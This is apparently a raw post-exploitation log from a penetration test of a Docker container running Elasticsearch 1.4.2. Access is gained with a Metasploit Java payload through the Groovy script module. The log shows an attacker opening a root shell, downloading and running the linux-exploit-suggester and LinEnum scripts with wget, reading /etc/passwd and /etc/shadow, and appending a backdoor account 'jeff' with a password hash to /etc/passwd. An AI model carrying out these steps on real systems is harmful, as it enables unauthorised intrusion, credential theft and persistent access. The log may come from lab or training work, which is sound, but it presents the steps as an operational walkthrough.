drwxr-xr-x   2 root root     4096 Sep 10  2019 srv
dr-xr-xr-x  13 root root        0 May  1 15:39 sys
drwxrwxrwt   1 root root     4096 May  1 20:51 tmp
drwxr-xr-x   1 root root     4096 Sep 10  2019 usr
drwxr-xr-x   1 root root     4096 Sep 10  2019 var
ps -ealwf
F S UID        PID  PPID  C PRI  NI ADDR SZ WCHAN  STIME TTY          TIME CMD
4 S root         1     0  0  80   0 -  5013 wait   15:39 ?        00:00:00 /bin/bash /main.sh default
4 S root        13     1  0  80   0 - 504219 futex_ 15:39 ?       00:01:18 /usr/bin/java -Xms256m -Xmx1g -Xss256k -Djava.awt.headless=true -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -XX:+HeapDumpOnOutOfMemoryError -XX:+DisableExplicitGC -Dfile.encoding=UTF-8 -Delasticsearch -Des.path.home=/elasticsearch -cp :/elasticsearch/lib/elasticsearch-1.4.2.jar:/elasticsearch/lib/*:/elasticsearch/lib/sigar/* org.elasticsearch.bootstrap.Elasticsearch
0 S root        34     1  0  80   0 -  1069 hrtime 15:39 ?        00:00:00 tail -f ./elasticsearch/logs/elasticsearch.log
0 S root        81     1  0  80   0 - 392747 futex_ 20:51 ?       00:00:00 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java -classpath /tmp/~spawn6086978643545029933.tmp.dir metasploit.Payload
0 S root        93    81  0  80   0 -  1085 wait   20:52 ?        00:00:00 sh -c /bin/sh
0 S root        96    93  0  80   0 -  1085 wait   20:52 ?        00:00:00 /bin/sh
0 S root        98    96  0  80   0 -  5011 wait   20:52 ?        00:00:00 bash
0 R root       102    98  0  80   0 -  4377 -      20:53 ?        00:00:00 ps -ealwf
cd /root
ls -al
total 20
drwx------ 1 root root 4096 Oct  6  2019 .
drwxr-xr-x 1 root root 4096 May  1 20:24 ..
-rw------- 1 root root  124 Oct  6  2019 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  140 Nov 19  2007 .profile
cd /home
ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun 14  2018 .
drwxr-xr-x 1 root root 4096 May  1 20:24 ..
ls -al /var/run/docker.sock
ls

^C
Terminate channel 1? [y/N]  y
meterpreter > shell
Process 2 created.
Channel 2 created.
id
uid=0(root) gid=0(root) groups=0(root)
ls -al /var/run/docker.sock

cd /
cd /var
ls
backups
cache
lib
local
lock
log
mail
opt
run
spool
tmp
cd run
ls
lock
network
systemd
utmp
ls -al
total 20
drwxr-xr-x 1 root root   4096 Oct  6  2019 .
drwxr-xr-x 1 root root   4096 May  1 20:24 ..
drwxrwxrwt 2 root root   4096 Sep 10  2019 lock
drwxr-xr-x 2 root netdev 4096 Oct  6  2019 network
drwxr-xr-x 2 root root   4096 Sep 10  2019 systemd
-rw-rw-r-- 1 root utmp      0 Sep 10  2019 utmp


=> We are running inside a Docker and we don't have access to "/var/run/docker.sock"


uname -a
Linux 782f6cae2a82 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64 GNU/Linux

cd /tmp/

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

ls -al
total 100
drwxrwxrwt 1 root root  4096 May  1 21:15 .
drwxr-xr-x 1 root root  4096 May  1 20:24 ..
drwxr-xr-x 1 root root  4096 May  1 20:51 hsperfdata_root
-rw-r--r-- 1 root root 84244 May  1 21:15 linux-exploit-suggester.sh

chmod +x linux-exploit-suggester.sh

./linux-exploit-suggester.sh

Available information:
Kernel version: 4.15.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 8
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:
73 kernel space exploits
45 user space exploits

Possible Exploits:

[+] [CVE-2018-1000001] RationalLove

   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

----------------

msf5 exploit(multi/elasticsearch/search_groovy_script) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set session 3
session => 3
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 172.20.0.124 - Collecting local exploits for java/linux...
[-] 172.20.0.124 - No suggestions available.
[*] Post module execution completed

----------------


cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:108::/var/run/dbus:/bin/false

echo 'jeff:$6$sMvDDKUxHticri6b$MQ0gNDaLCu54ofL0uF44ftB6W.GJKGExLRTFeidPJUgY/yYzFPdgkaHj2MdS9.iu.JSSw5DDAn7e4b.BgOVMi0:1005:1008::/:/bin/bash' >> /etc/passwd

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:108::/var/run/dbus:/bin/false
jeff:$6$sMvDDKUxHticri6b$MQ0gNDaLCu54ofL0uF44ftB6W.GJKGExLRTFeidPJUgY/yYzFPdgkaHj2MdS9.iu.JSSw5DDAn7e4b.BgOVMi0:1005:1008::/:/bin/bash


------------------

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

ls -al
total 148
drwxrwxrwt 1 root root  4096 May  1 21:51 .
drwxr-xr-x 1 root root  4096 May  1 20:24 ..
-rw-r--r-- 1 root root 46631 May  1 21:51 LinEnum.sh
drwxr-xr-x 1 root root  4096 May  1 20:51 hsperfdata_root
-rwxr-xr-x 1 root root 84244 May  1 21:15 linux-exploit-suggester.sh

chmod +x LinEnum.sh
./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Fri May  1 21:52:18 UTC 2020                                                                                                                                                                             
                                                                                                                                                                                                         

### SYSTEM ##############################################
[-] Kernel information:
Linux 782f6cae2a82 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.15.0-99-generic (buildd@lcy01-amd64-013) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020

[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

[-] Hostname:
782f6cae2a82

### USER/GROUP ##########################################
[-] Current user/group info:
uid=0(root) gid=0(root) groups=0(root)

[-] Users that have previously logged onto the system:
Username         Port     From             Latest

[-] Who else is logged on:
 21:52:18 up  6:13,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=103(systemd-timesync) groups=103(systemd-timesync)
uid=101(systemd-network) gid=104(systemd-network) groups=104(systemd-network)
uid=102(systemd-resolve) gid=105(systemd-resolve) groups=105(systemd-resolve)
uid=103(systemd-bus-proxy) gid=106(systemd-bus-proxy) groups=106(systemd-bus-proxy)
uid=104(messagebus) gid=108(messagebus) groups=108(messagebus)
uid=1005(jeff) gid=1008 groups=1008


[+] It looks like we have password hashes in /etc/passwd!
jeff:$6$sMvDDKUxHticri6b$MQ0gNDaLCu54ofL0uF44ftB6W.GJKGExLRTFeidPJUgY/yYzFPdgkaHj2MdS9.iu.JSSw5DDAn7e4b.BgOVMi0:1005:1008::/:/bin/bash


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:108::/var/run/dbus:/bin/false
jeff:$6$sMvDDKUxHticri6b$MQ0gNDaLCu54ofL0uF44ftB6W.GJKGExLRTFeidPJUgY/yYzFPdgkaHj2MdS9.iu.JSSw5DDAn7e4b.BgOVMi0:1005:1008::/:/bin/bash


[+] We can read the shadow file!
root:*:18149:0:99999:7:::
daemon:*:18149:0:99999:7:::
bin:*:18149:0:99999:7:::
sys:*:18149:0:99999:7:::
sync:*:18149:0:99999:7:::
games:*:18149:0:99999:7:::
man:*:18149:0:99999:7:::
lp:*:18149:0:99999:7:::
mail:*:18149:0:99999:7:::
news:*:18149:0:99999:7:::
uucp:*:18149:0:99999:7:::
proxy:*:18149:0:99999:7:::
www-data:*:18149:0:99999:7:::
backup:*:18149:0:99999:7:::
list:*:18149:0:99999:7:::
irc:*:18149:0:99999:7:::
gnats:*:18149:0:99999:7:::
nobody:*:18149:0:99999:7:::
systemd-timesync:*:18149:0:99999:7:::
systemd-network:*:18149:0:99999:7:::
systemd-resolve:*:18149:0:99999:7:::
systemd-bus-proxy:*:18149:0:99999:7:::
messagebus:*:18175:0:99999:7:::


[-] Super user account(s):
root


[+] We can read root's home directory!
total 20K
drwx------ 1 root root 4.0K Oct  6  2019 .
drwxr-xr-x 1 root root 4.0K May  1 20:24 ..
-rw------- 1 root root  124 Oct  6  2019 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
-rw-r--r-- 1 root root  140 Nov 19  2007 .profile


[-] Are permissions on /home directories lax:
total 8.0K
drwxr-xr-x 2 root root 4.0K Jun 14  2018 .
drwxr-xr-x 1 root root 4.0K May  1 20:24 ..


### ENVIRONMENTAL #######################################
[-] Environment information:
HOSTNAME=782f6cae2a82
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/tmp
HOME=/root
SHLVL=2
_=/usr/bin/env


[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root  4096 Sep 10  2019 /bin
drwxr-xr-x 1 root root  4096 Oct  6  2019 /sbin
drwxr-xr-x 1 root root  4096 Oct  6  2019 /usr/bin
drwxrwsr-x 2 root staff 4096 Sep 10  2019 /usr/local/bin
drwxrwsr-x 2 root staff 4096 Sep 10  2019 /usr/local/sbin
drwxr-xr-x 1 root root  4096 Oct  6  2019 /usr/sbin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash


[-] Current umask value:
0022
u=rwx,g=rx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK           022


[-] Password and storage information:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
total 36
drwxr-xr-x 2 root root  4096 Sep 10  2019 .
drwxr-xr-x 1 root root  4096 Oct  6  2019 ..
-rwxr-xr-x 1 root root 15000 Dec 11  2016 apt
-rwxr-xr-x 1 root root  1597 May  2  2016 dpkg
-rwxr-xr-x 1 root root   249 May 17  2017 passwd


### NETWORKING  ##########################################
[-] Network and IP info:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
17: eth0@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:14:00:7c brd ff:ff:ff:ff:ff:ff
    inet 172.20.0.124/16 brd 172.20.255.255 scope global eth0
       valid_lft forever preferred_lft forever


[-] ARP history:
172.20.0.3 dev eth0 lladdr 02:42:ac:14:00:03 REACHABLE
172.20.0.1 dev eth0 lladdr 02:42:ae:e6:96:b2 REACHABLE
172.20.0.7 dev eth0 lladdr 02:42:ac:14:00:07 STALE


[-] Nameserver(s):
nameserver 127.0.0.11


[-] Default route:
default via 172.20.0.1 dev eth0 


[-] Listening TCP:
State      Recv-Q Send-Q        Local Address:Port          Peer Address:Port 
LISTEN     0      128              127.0.0.11:46733                    *:*     
LISTEN     0      50                        *:9200                     *:*     
LISTEN     0      50                        *:9300                     *:*     


[-] Listening UDP:
State      Recv-Q Send-Q        Local Address:Port          Peer Address:Port 
UNCONN     0      0                         *:54328                    *:*     
UNCONN     0      0                127.0.0.11:47644                    *:*     


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  20052  2568 ?        Ss   15:39   0:00 /bin/bash /main.sh default
root        13  0.3 13.8 2016876 281944 ?      Sl   15:39   1:29 /usr/bin/java -Xms256m -Xmx1g -Xss256k -Djava.awt.headless=true -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -XX:+HeapDumpOnOutOfMemoryError -XX:+DisableExplicitGC -Dfile.encoding=UTF-8 -Delasticsearch -Des.path.home=/elasticsearch -cp :/elasticsearch/lib/elasticsearch-1.4.2.jar:/elasticsearch/lib/*:/elasticsearch/lib/sigar/* org.elasticsearch.bootstrap.Elasticsearch
root        34  0.0  0.0   4276   740 ?        S    15:39   0:00 tail -f ./elasticsearch/logs/elasticsearch.log
root        81  0.0  4.2 1569960 86504 ?       Sl   20:51   0:03 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java -classpath /tmp/~spawn6086978643545029933.tmp.dir metasploit.Payload
root       126  0.0  0.0   4340   760 ?        S    21:14   0:00 sh -c /bin/sh
root       128  0.0  0.0   4340  1548 ?        S    21:14   0:00 /bin/sh
root      1239  0.0  0.1  21044  3832 ?        S    21:52   0:00 /bin/bash ./LinEnum.sh
root      1240  0.5  0.1  21072  3352 ?        S    21:52   0:00 /bin/bash ./LinEnum.sh
root      1241  0.0  0.0   4240   644 ?        S    21:52   0:00 tee -a
root      1388  0.0  0.1  21072  2832 ?        S    21:52   0:00 /bin/bash ./LinEnum.sh
root      1389  0.0  0.1  17508  2096 ?        R    21:52   0:00 ps aux


[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root 1029624 Mar 25  2019 /bin/bash
lrwxrwxrwx 1 root root       4 Nov  8  2014 /bin/sh -> dash
lrwxrwxrwx 1 root root      22 Oct  6  2019 /usr/bin/java -> /etc/alternatives/java
-rwxr-xr-x 1 root root    6408 Aug 22  2019 /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java


[-] /etc/init.d/ binary permissions:
total 184
drwxr-xr-x 1 root root 4096 Oct  6  2019 .
drwxr-xr-x 1 root root 4096 Oct  6  2019 ..
-rw-r--r-- 1 root root 1135 Oct  6  2019 .depend.boot
-rw-r--r-- 1 root root  170 Oct  6  2019 .depend.start
-rw-r--r-- 1 root root  252 Oct  6  2019 .depend.stop
-rw-r--r-- 1 root root 2427 Apr  6  2015 README
-rwxr-xr-x 1 root root 1276 Apr  6  2015 bootlogs
-rwxr-xr-x 1 root root 1248 Apr  6  2015 bootmisc.sh
-rwxr-xr-x 1 root root 3807 Apr  6  2015 checkfs.sh
-rwxr-xr-x 1 root root 1072 Apr  6  2015 checkroot-bootclean.sh
-rwxr-xr-x 1 root root 9290 Apr  6  2015 checkroot.sh
-rwxr-xr-x 1 root root 2813 Oct 10  2016 dbus
-rwxr-xr-x 1 root root 1336 Apr  6  2015 halt
-rwxr-xr-x 1 root root 1423 Apr  6  2015 hostname.sh
-rwxr-xr-x 1 root root 3916 Mar 29  2015 hwclock.sh
-rwxr-xr-x 1 root root 1300 Apr  6  2015 killprocs
-rwxr-xr-x 1 root root  995 Apr  6  2015 motd
-rwxr-xr-x 1 root root  677 Apr  6  2015 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2138 Apr  6  2015 mountall.sh
-rwxr-xr-x 1 root root 1461 Apr  6  2015 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1564 Apr  6  2015 mountkernfs.sh
-rwxr-xr-x 1 root root  685 Apr  6  2015 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2456 Apr  6  2015 mountnfs.sh
-rwxr-xr-x 1 root root 4760 Dec 14  2014 networking
-rwxr-xr-x 1 root root 1192 May 17  2018 procps
-rwxr-xr-x 1 root root 6228 Apr  6  2015 rc
-rwxr-xr-x 1 root root  820 Apr  6  2015 rc.local
-rwxr-xr-x 1 root root  117 Apr  6  2015 rcS
-rwxr-xr-x 1 root root  661 Apr  6  2015 reboot
-rwxr-xr-x 1 root root 1042 Apr  6  2015 rmnologin
-rwxr-xr-x 1 root root 3207 Apr  6  2015 sendsigs
-rwxr-xr-x 1 root root  597 Apr  6  2015 single
-rw-r--r-- 1 root root 1087 Apr  6  2015 skeleton
-rwxr-xr-x 1 root root 6581 Mar 10  2017 udev
-rwxr-xr-x 1 root root  461 Mar 10  2017 udev-finish
-rwxr-xr-x 1 root root 2737 Apr  6  2015 umountfs
-rwxr-xr-x 1 root root 2202 Apr  6  2015 umountnfs.sh
-rwxr-xr-x 1 root root 1129 Apr  6  2015 umountroot
-rwxr-xr-x 1 root root 3111 Apr  6  2015 urandom
-rwxr-xr-x 1 root root 2666 Sep 25  2013 x11-common


[-] /etc/init/ config file permissions:
total 52
drwxr-xr-x 1 root root 4096 Oct  6  2019 .
drwxr-xr-x 1 root root 4096 Oct  6  2019 ..
-rw-r--r-- 1 root root  530 Jun  3  2014 network-interface-container.conf
-rw-r--r-- 1 root root 1756 May  4  2013 network-interface-security.conf
-rw-r--r-- 1 root root  933 Jun  3  2014 network-interface.conf
-rw-r--r-- 1 root root 2493 Jun  3  2014 networking.conf
-rw-r--r-- 1 root root  581 Apr 10  2014 startpar-bridge.conf
-rw-r--r-- 1 root root  637 Mar 10  2017 udev-fallback-graphics.conf
-rw-r--r-- 1 root root  643 Mar 10  2017 udev-finish.conf
-rw-r--r-- 1 root root  337 Mar 10  2017 udev.conf
-rw-r--r-- 1 root root  356 Mar 10  2017 udevmonitor.conf
-rw-r--r-- 1 root root  352 Mar 10  2017 udevtrigger.conf


[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 6.4M
drwxr-xr-x 1 root root 4.0K Oct  6  2019 system
drwxr-xr-x 2 root root 4.0K Sep 10  2019 network
drwxr-xr-x 2 root root 4.0K Sep 10  2019 system-generators
drwxr-xr-x 2 root root 4.0K Sep 10  2019 system-preset
-rwxr-xr-x 1 root root 295K Apr 25  2019 systemd-udevd
-rwxr-xr-x 1 root root 323K Apr 25  2019 systemd-machined
-rwxr-xr-x 1 root root  39K Apr 25  2019 systemd-modules-load
-rwxr-xr-x 1 root root  27K Apr 25  2019 systemd-quotacheck
-rwxr-xr-x 1 root root  14K Apr 25  2019 systemd-ac-power
-rwxr-xr-x 1 root root  43K Apr 25  2019 systemd-activate
-rwxr-xr-x 1 root root  35K Apr 25  2019 systemd-binfmt
-rwxr-xr-x 1 root root 283K Apr 25  2019 systemd-bus-proxyd
-rwxr-xr-x 1 root root 227K Apr 25  2019 systemd-cgroups-agent
-rwxr-xr-x 1 root root 283K Apr 25  2019 systemd-hostnamed
-rwxr-xr-x 1 root root 231K Apr 25  2019 systemd-journald
-rwxr-xr-x 1 root root 291K Apr 25  2019 systemd-localed
-rwxr-xr-x 1 root root 495K Apr 25  2019 systemd-logind
-rwxr-xr-x 1 root root  14K Apr 25  2019 systemd-multi-seat-x
-rwxr-xr-x 1 root root 511K Apr 25  2019 systemd-networkd
-rwxr-xr-x 1 root root  75K Apr 25  2019 systemd-networkd-wait-online
-rwxr-xr-x 1 root root  35K Apr 25  2019 systemd-remount-fs
-rwxr-xr-x 1 root root  23K Apr 25  2019 systemd-reply-password
-rwxr-xr-x 1 root root  75K Apr 25  2019 systemd-resolved
-rwxr-xr-x 1 root root  43K Apr 25  2019 systemd-shutdownd
-rwxr-xr-x 1 root root  51K Apr 25  2019 systemd-sleep
-rwxr-xr-x 1 root root  39K Apr 25  2019 systemd-sysctl
-rwxr-xr-x 1 root root  27K Apr 25  2019 systemd-user-sessions
-rwxr-xr-x 1 root root 1.3M Apr 25  2019 systemd
-rwxr-xr-x 1 root root  55K Apr 25  2019 systemd-backlight
-rwxr-xr-x 1 root root  83K Apr 25  2019 systemd-bootchart
-rwxr-xr-x 1 root root  63K Apr 25  2019 systemd-cryptsetup
-rwxr-xr-x 1 root root 251K Apr 25  2019 systemd-fsck
-rwxr-xr-x 1 root root 235K Apr 25  2019 systemd-initctl
-rwxr-xr-x 1 root root  31K Apr 25  2019 systemd-random-seed
-rwxr-xr-x 1 root root  71K Apr 25  2019 systemd-readahead
-rwxr-xr-x 1 root root  43K Apr 25  2019 systemd-rfkill
-rwxr-xr-x 1 root root  87K Apr 25  2019 systemd-shutdown
-rwxr-xr-x 1 root root  75K Apr 25  2019 systemd-socket-proxyd
-rwxr-xr-x 1 root root 291K Apr 25  2019 systemd-timedated
-rwxr-xr-x 1 root root 107K Apr 25  2019 systemd-timesyncd
-rwxr-xr-x 1 root root 235K Apr 25  2019 systemd-update-utmp
-rwxr-xr-x 1 root root  546 Apr 25  2019 debian-fixup
-rwxr-xr-x 1 root root  462 Apr 25  2019 systemd-logind-launch
drwxr-xr-x 2 root root 4.0K Apr  8  2017 system-shutdown
drwxr-xr-x 2 root root 4.0K Apr  8  2017 system-sleep
<SNIP>

/lib/systemd/system-sleep:
total 0


### SOFTWARE #############################################
### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/wget
/usr/bin/curl


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1379 May  1 21:34 /etc/passwd
-rw-r--r-- 1 root root 609 Oct  6  2019 /etc/group
-rw-r--r-- 1 root root 761 Oct 22  2014 /etc/profile
-rw-r----- 1 root shadow 744 May  1 21:21 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 44104 Nov  8  2014 /bin/ping
-rwsr-xr-x 1 root root 40000 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root root 40168 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 44552 Nov  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 27416 Mar 29  2015 /bin/umount
-rwsr-xr-x 1 root root 39912 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 54192 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 44464 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 53616 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 75376 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-- 1 root messagebus 298608 Jun 14  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper


[-] SGID files:
-rwxr-sr-x 1 root shadow 35408 May 27  2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 62272 May 17  2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 27232 Mar 29  2015 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22744 May 17  2017 /usr/bin/expiry


[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Nov 12  2016 /etc/pam.conf
-rw-r--r-- 1 root root 2084 May 17  2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 859 Nov 23  2012 /etc/insserv.conf
-rw-r--r-- 1 root root 2584 Feb  7  2014 /etc/gai.conf
-rw-r--r-- 1 root root 9 Aug  7  2006 /etc/host.conf
-rw-r--r-- 1 root root 604 May 15  2012 /etc/deluser.conf
-rw-r--r-- 1 root root 2969 Jun 17  2017 /etc/debconf.conf
-rw-r--r-- 1 root root 956 Dec 27  2016 /etc/mke2fs.conf
-rw-r--r-- 1 root root 34 Apr  9  2017 /etc/ld.so.conf
